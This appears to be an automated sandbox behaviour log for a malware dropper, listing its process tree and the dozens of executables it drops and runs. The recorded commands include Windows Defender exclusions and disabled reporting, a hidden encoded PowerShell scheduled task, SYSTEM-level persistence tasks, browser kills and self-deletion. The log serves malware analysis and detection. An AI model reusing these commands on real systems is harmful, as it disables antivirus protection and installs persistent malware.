PID 2956 wrote to memory of 2532	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
PID 2956 wrote to memory of 2532	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
PID 2956 wrote to memory of 2532	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	RCWQt2d5JS6ee5AZKe2cP0aJ.exe
PID 2956 wrote to memory of 3508	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	TD8L8ujNu36lGaJREpnXhoYf.exe
PID 2956 wrote to memory of 3508	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	TD8L8ujNu36lGaJREpnXhoYf.exe
PID 2956 wrote to memory of 3508	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	TD8L8ujNu36lGaJREpnXhoYf.exe
PID 2956 wrote to memory of 3168	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	CmKEiSndszc2KPMxiQQ_f5o6.exe
PID 2956 wrote to memory of 3168	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	CmKEiSndszc2KPMxiQQ_f5o6.exe
PID 2956 wrote to memory of 3168	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	CmKEiSndszc2KPMxiQQ_f5o6.exe
PID 2956 wrote to memory of 2120	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	IHznmwVbyPriG1Xy7TJe9c59.exe
PID 2956 wrote to memory of 2120	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	IHznmwVbyPriG1Xy7TJe9c59.exe
PID 2956 wrote to memory of 2120	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	IHznmwVbyPriG1Xy7TJe9c59.exe
PID 2956 wrote to memory of 2216	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	W9YQ67wVkEMzXb7t78erdLXI.exe
PID 2956 wrote to memory of 2216	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	W9YQ67wVkEMzXb7t78erdLXI.exe
PID 2956 wrote to memory of 2216	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	W9YQ67wVkEMzXb7t78erdLXI.exe
PID 2956 wrote to memory of 1900	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	BRkdmCwbwCcbEIqUj2VoQd_V.exe
PID 2956 wrote to memory of 1900	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	BRkdmCwbwCcbEIqUj2VoQd_V.exe
PID 2956 wrote to memory of 1900	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	BRkdmCwbwCcbEIqUj2VoQd_V.exe
PID 2956 wrote to memory of 2428	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	SharkSoftSetup36667.exe
PID 2956 wrote to memory of 2428	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	SharkSoftSetup36667.exe
PID 2956 wrote to memory of 2428	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	SharkSoftSetup36667.exe
PID 2956 wrote to memory of 1960	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	iJv7e5qhqW1GL9_OPheJLX93.exe
PID 2956 wrote to memory of 1960	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	iJv7e5qhqW1GL9_OPheJLX93.exe
PID 2956 wrote to memory of 1960	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	iJv7e5qhqW1GL9_OPheJLX93.exe
PID 2956 wrote to memory of 3056	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	TaW1dZd0vST9cSDFMV3LKJG9.exe
PID 2956 wrote to memory of 3056	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	TaW1dZd0vST9cSDFMV3LKJG9.exe
PID 2956 wrote to memory of 3056	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	TaW1dZd0vST9cSDFMV3LKJG9.exe
PID 2956 wrote to memory of 2768	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	C4pue43sbVMIJMsBKAOjQqST.exe
PID 2956 wrote to memory of 2768	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	C4pue43sbVMIJMsBKAOjQqST.exe
PID 2956 wrote to memory of 2768	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	C4pue43sbVMIJMsBKAOjQqST.exe
PID 2956 wrote to memory of 228	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	00rjOb6UEQkAFotzj0Q_HOOe.exe
PID 2956 wrote to memory of 228	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	00rjOb6UEQkAFotzj0Q_HOOe.exe
PID 2956 wrote to memory of 228	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	00rjOb6UEQkAFotzj0Q_HOOe.exe
PID 2956 wrote to memory of 2868	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	UvffXCe4GH6_D4Yjybn4bLja.exe
PID 2956 wrote to memory of 2868	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	UvffXCe4GH6_D4Yjybn4bLja.exe
PID 2956 wrote to memory of 3460	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	VejznfQIjgNXIaBBkdWkFsWz.exe
PID 2956 wrote to memory of 3460	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	VejznfQIjgNXIaBBkdWkFsWz.exe
PID 2956 wrote to memory of 3460	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	VejznfQIjgNXIaBBkdWkFsWz.exe
PID 2956 wrote to memory of 3408	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	qsIlM2N6g12QJPmeB6FzImDF.exe
PID 2956 wrote to memory of 3408	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	qsIlM2N6g12QJPmeB6FzImDF.exe
PID 2956 wrote to memory of 3408	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	qsIlM2N6g12QJPmeB6FzImDF.exe
PID 2956 wrote to memory of 384	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	P4G14v5bCo3CvSJgwYlWni8E.exe
PID 2956 wrote to memory of 384	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	P4G14v5bCo3CvSJgwYlWni8E.exe
PID 2956 wrote to memory of 384	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	P4G14v5bCo3CvSJgwYlWni8E.exe
PID 2956 wrote to memory of 1880	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	eND2CfpOuVuEbusfP_NwJzn5.exe
PID 2956 wrote to memory of 1880	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	eND2CfpOuVuEbusfP_NwJzn5.exe
PID 2956 wrote to memory of 1880	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	eND2CfpOuVuEbusfP_NwJzn5.exe
PID 2956 wrote to memory of 3016	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	EQJvLsG3NWwZFxScAIWfQOad.exe
PID 2956 wrote to memory of 3016	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	EQJvLsG3NWwZFxScAIWfQOad.exe
PID 2956 wrote to memory of 3016	2956	07187aaa44a712bf4d7d6d128c5feb85.exe	EQJvLsG3NWwZFxScAIWfQOad.exe

C:\Users\Admin\AppData\Local\Temp\07187aaa44a712bf4d7d6d128c5feb85.exe
"C:\Users\Admin\AppData\Local\Temp\07187aaa44a712bf4d7d6d128c5feb85.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2956

C:\Users\Admin\Pictures\Adobe Films\T6Ut5PqAOLGR19pZrBA6KnkN.exe
"C:\Users\Admin\Pictures\Adobe Films\T6Ut5PqAOLGR19pZrBA6KnkN.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2372

C:\Users\Admin\Pictures\Adobe Films\GL36O2snGtWy_eShImF7_ewF.exe
"C:\Users\Admin\Pictures\Adobe Films\GL36O2snGtWy_eShImF7_ewF.exe"
2⤵
- Executes dropped EXE
PID:1620

C:\Users\Admin\Pictures\Adobe Films\NFBzNF52CKECPCFVWu6mFjSp.exe
"C:\Users\Admin\Pictures\Adobe Films\NFBzNF52CKECPCFVWu6mFjSp.exe"
2⤵
- Executes dropped EXE
PID:1292

C:\Users\Admin\Documents\lGv56tg4TRxz0XFPeWymU9pO.exe
"C:\Users\Admin\Documents\lGv56tg4TRxz0XFPeWymU9pO.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4640

C:\Users\Admin\Pictures\Adobe Films\O8btRxHMGSOJ3P9iHg6k2cp3.exe
"C:\Users\Admin\Pictures\Adobe Films\O8btRxHMGSOJ3P9iHg6k2cp3.exe"
4⤵
- Executes dropped EXE
PID:2056

C:\Users\Admin\Pictures\Adobe Films\ZZhmjV_dtWbdMHspa6E5u6bE.exe
"C:\Users\Admin\Pictures\Adobe Films\ZZhmjV_dtWbdMHspa6E5u6bE.exe"
4⤵
- Executes dropped EXE
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 616
5⤵
- Program crash
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 652
5⤵
- Program crash
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 724
5⤵
- Program crash
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 732
5⤵
- Program crash
PID:2572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 880
5⤵
- Program crash
PID:3372

C:\Users\Admin\Pictures\Adobe Films\LmhIh4vwuUBdG5MbR9BuoTI8.exe
"C:\Users\Admin\Pictures\Adobe Films\LmhIh4vwuUBdG5MbR9BuoTI8.exe"
4⤵
- Executes dropped EXE
PID:3488

C:\Users\Admin\AppData\Local\Temp\is-8HLC9.tmp\LmhIh4vwuUBdG5MbR9BuoTI8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8HLC9.tmp\LmhIh4vwuUBdG5MbR9BuoTI8.tmp" /SL5="$901C8,140518,56832,C:\Users\Admin\Pictures\Adobe Films\LmhIh4vwuUBdG5MbR9BuoTI8.exe"
5⤵
- Executes dropped EXE
PID:3732

C:\Users\Admin\AppData\Local\Temp\is-20V2R.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-20V2R.tmp\RYUT55.exe" /S /UID=2709
6⤵
PID:3952

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
7⤵
PID:868

C:\Users\Admin\Pictures\Adobe Films\YckEzjnEIZ6I3VFxySLJivCJ.exe
"C:\Users\Admin\Pictures\Adobe Films\YckEzjnEIZ6I3VFxySLJivCJ.exe"
4⤵
PID:3756

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:3036

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4680

C:\Users\Admin\Pictures\Adobe Films\WK00LZ2u8UAMkRHlCI94qaRa.exe
"C:\Users\Admin\Pictures\Adobe Films\WK00LZ2u8UAMkRHlCI94qaRa.exe"
4⤵
- Executes dropped EXE
PID:2844

C:\Users\Admin\AppData\Local\Temp\7zS6BC2.tmp\Install.exe
.\Install.exe
5⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\7zS77D8.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:4244

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:5992

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:4388

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:4336

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:5656

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:5984

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:1536

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:2412

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRuTqGXZV" /SC once /ST 01:34:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:5896

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRuTqGXZV"
7⤵
PID:4880

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRuTqGXZV"
7⤵
PID:1864

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 17:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\IPbtVdj.exe\" j6 /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:4952

C:\Users\Admin\Pictures\Adobe Films\NyPBa0qGmtwsrP1u_CK6rRpw.exe
"C:\Users\Admin\Pictures\Adobe Films\NyPBa0qGmtwsrP1u_CK6rRpw.exe"
4⤵
PID:2520

C:\Users\Admin\Pictures\Adobe Films\VxYWOcfyyt1OA5DMiLdiS205.exe
"C:\Users\Admin\Pictures\Adobe Films\VxYWOcfyyt1OA5DMiLdiS205.exe"
4⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
5⤵
PID:4312

C:\Users\Admin\AppData\Local\Temp\MGDCM.exe
"C:\Users\Admin\AppData\Local\Temp\MGDCM.exe"
6⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\4KK79.exe
"C:\Users\Admin\AppData\Local\Temp\4KK79.exe"
6⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\4KK79.exe
"C:\Users\Admin\AppData\Local\Temp\4KK79.exe"
6⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\MF5BF.exe
"C:\Users\Admin\AppData\Local\Temp\MF5BF.exe"
6⤵
PID:4124

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\HQFZxAfS.cpl",
7⤵
PID:4548

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\HQFZxAfS.cpl",
8⤵
PID:3236

C:\Users\Admin\AppData\Local\Temp\GI594.exe
"C:\Users\Admin\AppData\Local\Temp\GI594.exe"
6⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\GI594.exe
"C:\Users\Admin\AppData\Local\Temp\GI594.exe"
6⤵
PID:2308

C:\Users\Admin\AppData\Local\Temp\MF5BF7H2GD7FH2M.exe
https://iplogger.org/1OAvJ
6⤵
PID:3784

C:\Users\Admin\AppData\Local\Temp\dengbing.exe
"C:\Users\Admin\AppData\Local\Temp\dengbing.exe"
5⤵
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 652
6⤵
- Program crash
PID:672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 656
6⤵
- Program crash
PID:5300

C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe
"C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Users\Admin\AppData\Local\Temp\add4dbfc-6fc7-48bb-afd8-3c1dfc9fe271.exe
"C:\Users\Admin\AppData\Local\Temp\add4dbfc-6fc7-48bb-afd8-3c1dfc9fe271.exe"
6⤵
PID:4892

C:\Users\Admin\AppData\Local\Temp\lima.exe
"C:\Users\Admin\AppData\Local\Temp\lima.exe"
5⤵
PID:4720

C:\Users\Admin\AppData\Local\Temp\lima.exe
"C:\Users\Admin\AppData\Local\Temp\lima.exe" -h
6⤵
PID:1788

C:\Users\Admin\AppData\Local\Temp\tvstream14.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream14.exe"
5⤵
PID:3236

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:4712

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:316

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
5⤵
PID:2520

C:\Users\Admin\AppData\Local\Temp\BCleaner_App.exe
"C:\Users\Admin\AppData\Local\Temp\BCleaner_App.exe"
5⤵
PID:308

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
5⤵
PID:1448

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
5⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
5⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\temp-working.exe
"C:\Users\Admin\AppData\Local\Temp\temp-working.exe"
6⤵
PID:4704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4704 -s 2324
7⤵
- Program crash
PID:3404

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
5⤵
PID:1100

C:\Users\Admin\AppData\Local\Temp\ujwGhFvA1Zxno\Application578.exe
C:\Users\Admin\AppData\Local\Temp\ujwGhFvA1Zxno\Application578.exe
6⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
5⤵
PID:1384

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\HQFZxAfS.cpl",
6⤵
PID:3088

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\HQFZxAfS.cpl",
7⤵
PID:5356

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\HQFZxAfS.cpl",
8⤵
PID:5084

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\HQFZxAfS.cpl",
9⤵
PID:4256

C:\Users\Admin\AppData\Local\Temp\ZkppF1PqhiDCHgjMUDgBlkqBr.exe
"C:\Users\Admin\AppData\Local\Temp\ZkppF1PqhiDCHgjMUDgBlkqBr.exe"
5⤵
PID:4272

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
5⤵
PID:2556

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:5736

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:4476

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
8⤵
PID:2768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
9⤵
PID:4660

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
8⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
5⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:5876

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:4752

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
8⤵
PID:5656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
9⤵
PID:5056

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
8⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
5⤵
PID:3728

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:5700

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:4228

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
8⤵
PID:5400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
9⤵
PID:3328

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
8⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
5⤵
PID:5184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5184 -s 1688
6⤵
- Program crash
PID:2820

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4464

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3688

C:\Users\Admin\Pictures\Adobe Films\9hJ6mEjCyQ9fpX7eI2eYA1qG.exe
"C:\Users\Admin\Pictures\Adobe Films\9hJ6mEjCyQ9fpX7eI2eYA1qG.exe"
2⤵
- Executes dropped EXE
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 624
3⤵
- Program crash
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 632
3⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 748
3⤵
- Program crash
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 816
3⤵
- Program crash
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1224
3⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1232
3⤵
- Program crash
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1236
3⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "9hJ6mEjCyQ9fpX7eI2eYA1qG.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\9hJ6mEjCyQ9fpX7eI2eYA1qG.exe" & exit
3⤵
PID:3608

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "9hJ6mEjCyQ9fpX7eI2eYA1qG.exe" /f
4⤵
- Kills process with taskkill
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1104
3⤵
- Program crash
PID:396

C:\Users\Admin\Pictures\Adobe Films\IearPpy69u0Xt9jmtemmbfxe.exe
"C:\Users\Admin\Pictures\Adobe Films\IearPpy69u0Xt9jmtemmbfxe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2124

C:\Users\Admin\Pictures\Adobe Films\TD8L8ujNu36lGaJREpnXhoYf.exe
"C:\Users\Admin\Pictures\Adobe Films\TD8L8ujNu36lGaJREpnXhoYf.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im TD8L8ujNu36lGaJREpnXhoYf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\TD8L8ujNu36lGaJREpnXhoYf.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:2556

C:\Windows\SysWOW64\taskkill.exe
taskkill /im TD8L8ujNu36lGaJREpnXhoYf.exe /f
4⤵
- Kills process with taskkill
PID:4472

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:1668

C:\Users\Admin\Pictures\Adobe Films\00rjOb6UEQkAFotzj0Q_HOOe.exe
"C:\Users\Admin\Pictures\Adobe Films\00rjOb6UEQkAFotzj0Q_HOOe.exe"
2⤵
- Executes dropped EXE
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 484
3⤵
- Drops file in Program Files directory
- Program crash
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 476
3⤵
- Program crash
PID:3536

C:\Users\Admin\Pictures\Adobe Films\C4pue43sbVMIJMsBKAOjQqST.exe
"C:\Users\Admin\Pictures\Adobe Films\C4pue43sbVMIJMsBKAOjQqST.exe"
2⤵
- Executes dropped EXE
PID:2768

